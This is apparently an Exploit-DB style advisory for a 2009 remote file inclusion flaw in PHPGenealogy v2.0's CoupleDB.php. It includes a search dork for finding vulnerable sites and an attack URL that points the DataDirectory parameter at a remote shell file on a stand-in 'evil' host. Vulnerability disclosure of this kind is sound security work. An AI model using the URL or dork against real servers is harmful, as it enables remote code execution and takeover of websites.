PHPGenealogy v2.0 Rfi

vendor:

PHPGenealogy

by:

Sina Yazdanmehr (R3d.W0rm)

7,5

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: PHPGenealogy

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:phpgenealogy:phpgenealogy:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHPGenealogy v2.0 is vulnerable to a Remote File Inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it on the vulnerable server. This vulnerability exists due to insufficient sanitization of user-supplied input to the 'DataDirectory' parameter in 'CoupleDB.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the 'DataDirectory' parameter.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. All input data should be validated and filtered before being passed to the vulnerable script.

Source

Exploit-DB raw data:

#####################################################################################
####                           PHPGenealogy v2.0 Rfi                             ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://ircrash.com                                                      #
#My Official WebSite : http://r3dw0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://sourceforge.net/project/showfiles.php?group_id=98241             #
#                                                                                   #
#Dork : PHPGÃ©nÃ©alogie fonctionne sur un serveur PHP                                 #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://[site]/[path]/CoupleDB.php?Parametre=0&DataDirectory=http://evil/shell.txt? #
#                                                                                   #
###################################### TNX GOD ######################################

# milw0rm.com [2009-07-15]